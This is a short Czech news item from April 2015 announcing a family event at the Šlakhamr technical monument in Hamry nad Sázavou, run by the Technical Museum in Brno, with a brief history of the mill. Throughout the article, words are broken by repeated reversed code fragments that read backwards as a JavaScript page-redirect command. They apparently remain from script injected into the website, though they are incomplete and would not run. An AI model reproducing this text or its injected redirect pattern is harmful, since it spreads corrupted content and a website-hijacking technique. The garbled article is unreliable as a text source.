Rainbow page separator

Ve Šlakhamru bude v sobotu slavit Večerníček

Čtvrtek, 30. dubna 2015

VEČERNÍČEK SLAVÍ … NA ŠLAKHAMRU

Hamry nad Sázavou / Večerníček slaví… na Šlakhamru se jmenuje akce pro veřejnost pořádaná Technickým muzeem v Brně, která se uskuteční v sobotu 2. května od 10 do 17 hodin v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách technické památky Šlakhamr v Hamrech nad Sázavou. Návštěvníci se mohou těšit na zajímavý program pro malé i velké. Kromě kovářů cekají na rodiny s dětmi i hravé dospělé soutěžní stanoviště s úkoly, kde si procvičí své znalosti, dovednosti a zručnost.
Šroubek a Matička, maskoti dětských doprovodných programů Technického muzea v Brně, zájemce ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát zavedou do pohádek. Akce Večerníček slaví… na Šlakhamru připomene, že oblíbené pohádky na dobrou noc se na televizních obrazovkách objevují již půl s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí. K vidění budou rovněž ukázky kování na velkém bucharu i na ručních kovadlinách.
Tradiční hamernictví se v oblasti udrželo až do 17. s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toletí, poté většina hamrů zanikla. Na opuštěném vodním náhonu šlakhamerského hamru byl následně vybudován mlýn, který fungoval až do druhé svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války. Posledními hospodáři byla mlynářská rodina Brdíčků, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se objektu říkalo Brdíčkův mlýn.
V roce 1976 získalo chátrající Šlakhamr do své správy Technické muzeum v Brně, které tam po dlouhé rekonstrukci otevřelo expozici. Její součástí je také funkční, vodním kolem poháněné hamerské kladivo a jeho příslušenství. Šlakhamr ožívá několikrát do roka při akcích pro veřejnost.